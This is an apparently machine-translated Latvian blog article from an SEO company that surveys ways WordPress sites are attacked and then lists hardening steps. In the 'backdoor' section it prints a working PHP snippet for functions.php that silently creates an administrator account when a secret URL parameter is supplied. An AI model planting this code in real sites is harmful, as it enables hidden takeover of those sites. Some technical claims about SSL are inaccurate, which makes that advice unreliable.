• WordPress

Kā uzlauzt WordPress?

  • Felix Rose-Collins
  • 7 min read
Kā uzlauzt WordPress?

Ievads

Pirms sākt šo rakstu, mēs vēlamies, lai jūs zinātu, ka hakeru darbība ir nelikumīga, un mēs nemotivējam un neveicinām nekādas ļaunprātīgas darbības. Šis raksts ir domāts tikai un vienīgi tam, lai iegūtu zināšanas par to, kā darbojas krāpnieki un kā dažādas vietņu drošības metodes ir būtiskas, lai tos noturētu no rokas. Apspriedīsim:

  • Kā krāpnieki uzlauž WordPress?
  • Kā pasargāt WP vietni no krāpniekiem?

Tātad, bez liekas laika kavēšanās, sāksim šo tēmu.

Kā Hack WordPress mājas lapā tiešsaistē?

How to Hack WordPress Website Online (Avots: wpsecurityninja.com)

WPScan lietošana:

WPScan ir WP drošības skeneris, kas palīdz vietņu īpašniekiem pārbaudīt savu WordPress vietni ievainojamības, bet šo skeneri izmanto arī hakeri, lai izpildītu savus motīvus, lai uzlauztu vietnes.

WPScan ļauj vietņu īpašniekiem un administratoriem norādīt WP lietotāju kontus un brutālā spēka paroles un ir galvenais solis, lai iegūtu nesankcionētu piekļuvi WP kontiem.

Brute force username and password using WPScan (Lietotājvārds un parole ar brutālu spēku, izmantojot WPScan. Avots: Medium)

MIM uzbrukumi:

Ja lietotāji izmanto līdzīgus LAN tīklus, var viegli veikt "Man-in-middle" (MIM) uzbrukumus. Nešifrēti lietotāju pieteikumi ir viegls mērķis, jo visa informācija ir redzama atklātā tekstā.

Šāda veida uzbrukumu veikšanā iesaistītā programmatūra var noteikt apdraudētās tēmas, spraudņus un uzskaitīt lietotājus.

MIM Attacks (Avots: Medium)

SQL injekcijas:

SQL injekcijas uzbrukumi tiek uzskatīti par visizplatītākajiem uzbrukumiem, kas tiek izmantoti, lai iekļūtu tīmekļa vietnēs. Šo uzbrukumu mērķis ir vietnes aizmugurējie vārti, kas ļauj hakeriem iekļūt tajos, īstenojot apdraudētas komandas.

SQL Injections (Avots: secure.wphackedhelp.com)

Iepazīstieties ar Ranktracker

"Viss vienā" platforma efektīvai SEO optimizācijai

Katra veiksmīga uzņēmuma pamatā ir spēcīga SEO kampaņa. Taču, ņemot vērā neskaitāmos optimizācijas rīkus un paņēmienus, var būt grūti saprast, ar ko sākt. Nu, nebaidieties, jo man ir tieši tas, kas jums palīdzēs. Iepazīstinu ar Ranktracker "viss vienā" platformu efektīvai SEO optimizācijai.

Mēs beidzot esam atvēruši reģistrāciju Ranktracker pilnīgi bez maksas!

Izveidot bezmaksas kontu

Vai Pierakstīties, izmantojot savus akreditācijas datus

Šāda iekļūšana ļauj hakeriem arī modificēt datubāzes un komandas, kā arī dzēst vai nozagt vietnes informāciju.

Tā kā šajos SQL uzbrukumos tiek pamanītas neaizsargātas un nesakārtotas vietnes, tie atvieglo un padara hakeru uzlaušanas uzdevumu veiksmīgu.

Izmantojot My SQL/cPanel:

Izmantojot šo metodi, hakeri izveido viltus kontu vai maina pašreizējā WP vietnes lietotāja paroli. Hakeri mēģina iekļūt caur cPanel, atverot PhpMyAdmin. Viņi meklē tabulu, kas beidzas ar _users, un atrod lietotāju, kuru vēlas modificēt.

Tas ļaus viņiem mainīt tā lietotāja akreditācijas datus, kuru viņi plāno uzlauzt. Viņi izseko lietotāju un maina lietotāja paroli (no lauka user_pass), atverot tiešsaistes MD5 ģeneratoru un aizstāj to ar sev vēlamo, un vēlāk noklikšķina uz #.

Utilizing My SQL/cPanel (Lietotāju vārdi, lietotāju paroles, viņu e-pasta ID u. c. tiek glabāti datubāzes tabulā wp_users. Avots: firstsiteguide.com)

Lietotāju vārdi, lietotāju paroles, viņu e-pasta ID u. c. tiek glabāti datubāzes tabulā wp_users.

Funkcijas.php rediģēšana:

Hakeri piekļūst arī cPanel, lai modificētu failu Functions.php. Atbloķējot failu pārvaldnieku, viņi meklē aktīvās tēmas mapi. No mapes public_html/wp_content/themes viņi izseko tēmu un rediģē functions.php, ievietojot savu kompromitēto kodu. Uzlaušana jau ir procesā, jo hakeri ir izveidojuši jaunu kontu. Kad tas ir izdarīts, viņi izdzēš kompromitēto kodu.

Izveidojiet jaunu lietotāja kontu, izmantojot FTP:

Parasti FTP konti palīdz vietņu īpašniekiem vietnē izveidot direktoriju, kas ļauj konkrētiem lietotājiem augšupielādēt/saņemt failus, izmantojot viņu pieteikšanās akreditācijas datus.

Šie faili tiek skatīti arī internetā.

FTP konta izveides soļi vietnē:

  • Ievadiet vēlamos datus
  • Ievadiet jaunā FTP lietotāja lietotājvārdu.
  • Ievadiet paroli, lai piešķirtu kontu piekļuvei, izmantojot FTP
  • Ievadiet direktorija nosaukumu, lai piešķirtu piekļuvi, izmantojot FTP
  • Ierakstiet vēlamo MB vietu, ko vēlaties piešķirt šai mapei.
  • Vēlāk nospiediet pogu " Izveidot ", lai izveidotu jaunu kontu.

Lai jaunais lietotājs varētu piekļūt, izmantojot FTP, ir jāievada turpmāk minētie dati.


Adrese / Uzņēmēja nosaukums / Adrese: yourdomain.com vai ftp.yourdomain.com Lietotājs / Lietotājs: user@yourdomain.com Parole: El parole, kas piešķirta šim FTP kontam.

Port: 21Nosauciet mapi failu augšupielādei/izsūtīšanai.


Jaunajam lietotājam būs lasīšanas un rakstīšanas tiesības gan uz izvēlēto direktoriju, gan uz visiem tajā esošajiem apakšdirektorijiem. Piemēram, ja izveidojat klienta lietotāju un piešķirat viņam piekļuvi direktorijai / home / user / public_html.

Iekļūšana caur aizmugurējām durvīm:

Ļaunprātīgs veids, kā iekļūt vietnē, ir caur aizmugurējām durvīm. Gan krāpniekam, kas vēlas piekļūt jūsu vietnei, gan cietušajam lietotājam, kurš vēlas atgūt piekļuvi savai vietnei, izmantojot aizmugurējo durvju iekļūšanu, abiem ir jāveic turpmāk minētās darbības.

Iepazīstieties ar Ranktracker

"Viss vienā" platforma efektīvai SEO optimizācijai

Katra veiksmīga uzņēmuma pamatā ir spēcīga SEO kampaņa. Taču, ņemot vērā neskaitāmos optimizācijas rīkus un paņēmienus, var būt grūti saprast, ar ko sākt. Nu, nebaidieties, jo man ir tieši tas, kas jums palīdzēs. Iepazīstinu ar Ranktracker "viss vienā" platformu efektīvai SEO optimizācijai.

Mēs beidzot esam atvēruši reģistrāciju Ranktracker pilnīgi bez maksas!

Izveidot bezmaksas kontu

Vai Pierakstīties, izmantojot savus akreditācijas datus

Gadījumos, kad, izmantojot FTP, tiek izveidots jauns lietotāja konts vai veikta paroles atiestatīšana, bet tas nedod vēlamos rezultātus, lietotājs var vēlēties uzlauzt vietni, izmantojot aizmugurējo durvju ierakstu, un atgūt savu administratora piekļuvi.

Soļi, lai izveidotu aizmugurējās durvis:

  • Atveriet failu functions.php un ielīmējiet tālāk minēto kodu.
add_action('wp_head', 'wploop_backdoor'); 
function wploop_backdoor() {
If ($_GET['backdoor'] == 'knockknock') {
require('wp-includes/registration.php');
If (!username_exists('username')) {
$user_id = wp_create_user('name', 'pass');
$user = new WP_User($user_id);
$user->set_role('administrator');
}
}
}
?>
  • Vēlāk saglabājiet izmaiņas.

Crypto Jacking & Cryptocurrency Mining:

Kriptovalūtu popularitāte ir radījusi jaunus kiberdraudus, piemēram, kriptovalūtu zādzību, ko dēvē arī par kriptovalūtu ieguves ļaunprogrammatūru.

Datora konfiskāciju pret lietotāja gribu un apziņu sauc par kriptogrāfijas zādzību. Kriptogrāpšanas ļaunprātīgās programmatūras gadījumā krāpnieki inficē lietotāja datoru ar ļaunprātīgu programmatūru, kas tiek piegādāta, izmantojot programmatūru, lai kompromitētu sistēmas un tīklus.

Pikšķerēšana:

Pikšķerēšana ir metode, ar kuru krāpnieki, uzdodoties par juridiskām personām, izkrāpj no lietotājiem viņu sensitīvo informāciju (pieteikumvārdus, sociālā konta numuru, PIN kodu, kredītkartes informāciju u. c.). Lai īstenotu savu mērķi, viņi parasti izmanto e-pasta vēstules.

Piemērs: Krāpnieks var uzdoties par uzticamu avotu un vākt lietotāju personas datus, lai izpildītu savas vēlmes. Krāpnieks var arī ievietot viltus saiti pikšķerēšanas e-pastā un novirzīt uz kādu krāpniecisku vietni, lai piegādātu ļaunprātīgu programmatūru.

Ļaunprātīga programmatūra:

WordPress drošības statistika liecina, ka 4000 WP vietnes ir inficētas ar ļaunprātīgu programmatūru viltotu SEO spraudņu dēļ.

Krāpniekiem nav nepieciešams avots, lai piegādātu ļaunprātīgu programmatūru. SEO spraudņi, WP tēmas un daudzi citi vietnē esošie faktori ir motivējuši hakerus izmantot neseno WP-VCD ļaunprātīgo programmatūru.

Pat pikšķerēšanas e-pasta vēstules ir vārti ļaunprātīgas programmatūras piegādei.

Arī šajā gadījumā hakeru devīze ir tāda pati, t. i., iegūt sensitīvus datus no lietotājiem, iekļūstot sistēmās un nozogot informāciju.

WordPress izpirkumprogrammatūra:

WP izspiedējvīrusa programmā hakeri izmanto ļaunprātīgu programmatūru, lai bloķētu lietotāju piekļuvi sistēmām un tīkliem. Lietotājs to var atgūt, samaksājot hakeru pieprasīto izpirkuma maksu.

Piemērs: Petya uzbrukums, kad hakeris šifrē jūsu failus un datus un pieprasa izpirkuma maksu par atšifrēšanas atslēgu.

Vietņu šķērssituāciju skriptu (XSS) uzbrukums:

XSS uzbrukumus hakeri veic, ievadot vietnē ļaunprātīgu saturu, tādējādi izmantojot pārlūkprogrammu. Šis uzbrukums ļauj hakerim nozagt datus no sīkfailiem, modificēt vietnes saturu un pārņemt vietni, lai iegūtu sensitīvus datus.

Klikšķu zādzība:

Klikšķu uzlaušanas gadījumā hakeris ļaunprātīgi mēģina kompromitēt pogu/saiti un motivē lietotāju noklikšķināt uz kompromitētā objekta. Tas ļauj hakerim izpildīt ļaunprātīgas komandas, lai iegūtu piekļuvi lietotāja sensitīviem datiem.

Spoofing:

Spoofing ir uzbrukums, kurā persona maskējas par uzticamu identitāti, lai iegūtu nelikumīgu labumu lietotājam un piespiestu to iesniegt savu konfidenciālo informāciju.

Lai novērstu visus šos hakeru uzbrukumus, ir jāveic īpaši drošības pasākumi WP vietnes aizsardzībai.

Kā aizsargāt WordPress vietni no uzlaušanas?

How to Secure WordPress Website from Hacking? (Avots: envisagedigital.co.uk)

Iepriekš minētie statistikas dati ir pietiekami, lai norādītu uz WordPress popularitāti. Tieši šī popularitāte padara šo CMS platformu vēl pieprasītāku hakeru vidū, kuri izmēģina dažādas hakeru metodes, lai piekļūtu WP vietnēm un to datiem.

Tāpēc ir svarīgi zināt, kā novērst hakeru piekļuvi jūsu WP vietnei.

Nodrošiniet savu WP vietni ar SSL sertifikātu:

Kad vietnē tiek ielādēti jebkādi dati, tie vienmēr ir vienkāršā teksta formātā, kas ir viegli pamanāms visiem, tostarp hakeriem. Tas var būt riskanti, jo hakeri var ļaunprātīgi izmantot jūsu vietnes datus.

SSL (Secure Socket Layers ) sertifikāti ir digitālie sertifikāti, kas palīdz nodrošināt jūsu WP vietni ar 256 bitu šifrēšanas drošību, tādējādi pārvēršot jūsu vietnes datus kodētā formātā.

Hakeri nevar nolasīt kodus, lai gan viņi ir ieguvuši piekļuvi jūsu vietnei, tāpēc viņi ir spiesti pamest šādas vietnes.

Secure your WP site with SSL Certificate (Avots: clickssl.net)

Izvēlieties vēlamo SSL sertifikāta zīmolu (Comodo, Thawte, RapidSSL u.c.) un instalējiet to savā WP vietnē. Attiecībā uz SSL sertifikāta veidu jums ir jāsaprot, kas ir domēni un apakšdomēni. Piemēram, ja jūsu WP vietnei ir apakšdomēni, tad ar vienu lētu Wildcard sertifikātu, kas maksā tikai 45 ASV dolārus gadā, var nodrošināt visu jūsu digitālo biznesu.

Ātra izsniegšana, 2048 bitu atslēgas šifrēšana, SEO uzlabošana, vietnes uzticamības zīmogs, 99 % pārlūku/mobilā tālruņa saderība, atmaksas politika un garantija ir tikai dažas no Wildcard SSL sertifikātu uzstādīšanas funkcijām un priekšrocībām.

Dažādi SSL produktu zīmoli un iespējas, draudzīgas cenas un lielisks klientu serviss ir dažas no priekšrocībām, ko sniedz ClickSSL veikals, lai nodrošinātu jūsu WP vietnes drošību.

Atjauniniet savus darbiniekus:

Cilvēku kļūdas var būt katastrofālas, tāpēc vienmēr gādājiet, lai jūsu darbinieki būtu informēti par jaunākajiem kibernoziegumiem, tādējādi novēršot viņu neaizsargātību.

Ja jūsu darbinieki var izsekot aizdomīgus signālus par uzlauztu vietni jau sākotnējā posmā, viņi var informēt attiecīgos dienestus un novērst turpmāku kaitējumu jūsu vietnei un uzņēmumam.

Izmantojiet divu faktoru autentifikāciju (2FA):

Galvenais veids, kā novērst brutāla spēka uzbrukumus, ir 2FA ieviešana vietnes pieteikšanās laikā. Papildus tam, ka tās ne tikai papildina vēl vienu drošības līmeni, bet arī novērš vietnes un lietotāja datu aizsardzību.

Tas ir tāpēc, ka, ja viens drošības slānis ir apdraudēts, krāpniekam ir jāiekļūst otrajā slānī, lai piekļūtu vietnei.

Tas ir grūts uzdevums, tāpēc lielākajā daļā gadījumu krāpnieki pāriet uz citām slikti nodrošinātām vietnēm.

Padoms: WP 2FA ir bezmaksas WP spraudnis, kas jūsu WP vietnei nodrošina papildu drošības līmeni.

Regulāra administratora lietotāju revīzija:

Tas ir svarīgi jūsu WP vietnes drošībai. Pārliecinieties, ka regulāri veicat administratora lietotāju revīziju un kontrolējat viņu piekļuves.

Lai novērstu drošības nepilnības, nodrošiniet arī to, ka lietotājiem un darbiniekiem ir ierobežota piekļuve atbilstoši viņu uzdevumiem.

Regulāri atjauniniet WordPress kodolu:

Nezinat par WP Core?

Ļaujiet man īsi jums, ka WP Core ietver visus pamata pamatfailus, kas nepieciešami WP darbam.

Failu saraksts WP zip failā, kas lejupielādēts no WordPress.org

Update WordPress Core Regularly (Avots: ithemes.com)

Šie pamatfaili ir regulāri jāatjaunina pēc drošības atjauninājumu izlaišanas, lai novērstu visas drošības nepilnības.

Lejupielādējiet WP tēmas un spraudņus no uzticamiem avotiem:

Tas ir ļoti svarīgi, jo spraudņi var būt bīstami, ja tie nav atjaunināti vai instalēti no neuzticamiem avotiem. Izmantojot bezmaksas/apmaksātus spraudņus, vienmēr pārbaudiet turpmāk minētos faktorus, piemēram:

  • Lietotāju vērtējumi un atsauksmes
  • Lietotājam draudzīgums
  • Savietojamība
  • Drošība
  • Uzticamība

Download WP Themes & Plugins from Trustworthy Sources (Avots: torquemag.io)

Tas pats noteikums attiecas arī uz WP tēmu instalēšanu.

Regulāri atjauniniet WP tēmas un spraudņus:

Novecojušas vai ar beigušos WP tēmas un spraudņi vienmēr apdraud jūsu WP vietni, jo tie zaudē savus drošības standartus. Lai novērstu to, ka hakeri izmanto šādus vārtus ļaunprātīgas programmatūras izplatīšanai, lai piekļūtu vietnei, regulāri atjauniniet WP vietnē izmantotās tēmas un spraudņus.

Tas palīdzēs spraudnim pareizi darboties un sinhronizēties ar jaunākajām WP versijām.

Padoms: Iespraudņu lapā varat apskatīt visus instalētos spraudņus un blakus katram spraudnim ir norādīta saite "Ieslēgt automātiskos atjauninājumus". Ieslēdziet to, lai automātiski atjauninātos.

Mainīt noklusējuma administratora nosaukumu:

Hakeri ir pārāk gudri, un viņi var viegli iekļūt jūsu WP vietnē, izmantojot noklusējuma administratora vārdu. Vienmēr ir ieteicams mainīt noklusējuma administratora lietotājvārdu, lai novērstu hakeru iespējas veikt brute-force uzbrukumus un iegūt nesankcionētu piekļuvi jūsu vietnei.

Ierobežotas piekļuves piešķiršana:

Nekad nedodiet vairāk, nekā nepieciešams, un tas pats noteikums attiecas uz piekļuves piešķiršanu vietnei gan lietotājiem, gan darbiniekiem.

Piekļuves kontrole ir galvenais vietnes un datu drošības noteikums, jo tā nosaka, kas var vai nevar piekļūt vietnei. Bloķējiet visas ieejas WP administratoram un citiem svarīgiem kodiem un datiem, lai nodrošinātu vietnes drošību.

Ierobežota piekļuve ne tikai uzlabo produktivitāti, bet arī aizsargā jūsu vietni pret ļaunprātīgiem ierakstiem.

Atjaunināt WordPress:

Ja jūsu WordPress nav atjaunināts, pastāv risks, ka jūsu vietni var uzlauzt hakeri.

WordPress pārvalda 37% tirgus daļas, un tas regulāri izdod atjauninājumus, lai novērstu drošības caurumus un kļūdas. Šie atjauninājumi ietver arī jaunas funkcijas un esošo funkciju uzlabojumus, kas ir noderīgi, lai uzlabotu jūsu vietnes veiktspēju.

Iepazīstieties ar Ranktracker

"Viss vienā" platforma efektīvai SEO optimizācijai

Katra veiksmīga uzņēmuma pamatā ir spēcīga SEO kampaņa. Taču, ņemot vērā neskaitāmos optimizācijas rīkus un paņēmienus, var būt grūti saprast, ar ko sākt. Nu, nebaidieties, jo man ir tieši tas, kas jums palīdzēs. Iepazīstinu ar Ranktracker "viss vienā" platformu efektīvai SEO optimizācijai.

Mēs beidzot esam atvēruši reģistrāciju Ranktracker pilnīgi bez maksas!

Izveidot bezmaksas kontu

Vai Pierakstīties, izmantojot savus akreditācijas datus

Why you should always update your wordpress (Avots: wpbeginner.com)

Uzturiet savu WP vietni atjauninātu, lai nodrošinātu stabilu drošību.

Pabeigšana:

Izmantojiet spēcīgas un sarežģītas paroles un uzturiet savu WP vietni, kā arī spraudņus un tēmas atjauninātas, lai novērstu visas drošības nepilnības. Atvēliet laiku darbinieku izglītošanai, jo tas vienmēr palīdzēs novērst katastrofas.

Nekad nepazaudējiet drošību un vienmēr izmantojiet labākos un uzticamākos drošības spraudņus, lai jūsu WP vietne būtu droša no ziņkārīgo acīm. Turklāt nodrošiniet savu vietni ar SSL, lai uzlabotu klientu uzticēšanos, uzņēmējdarbību un SEO.

Tagad, kad jūs zināt, kā darbojas hakeri, mēs ceram, ka šis raksts palīdzēs jums novērst hakeru iekļūšanu jūsu vietnē un pārvaldīt jūsu WP vietni drošā veidā.

Felix Rose-Collins

Felix Rose-Collins

Ranktracker's CEO/CMO & Co-founder

Felix Rose-Collins is the Co-founder and CEO/CMO of Ranktracker. With over 15 years of SEO experience, he has single-handedly scaled the Ranktracker site to over 500,000 monthly visits, with 390,000 of these stemming from organic searches each month.

Sāciet izmantot Ranktracker... Bez maksas!

Noskaidrojiet, kas kavē jūsu vietnes ranga saglabāšanu.

Izveidot bezmaksas kontu

Vai Pierakstīties, izmantojot savus akreditācijas datus

Different views of Ranktracker app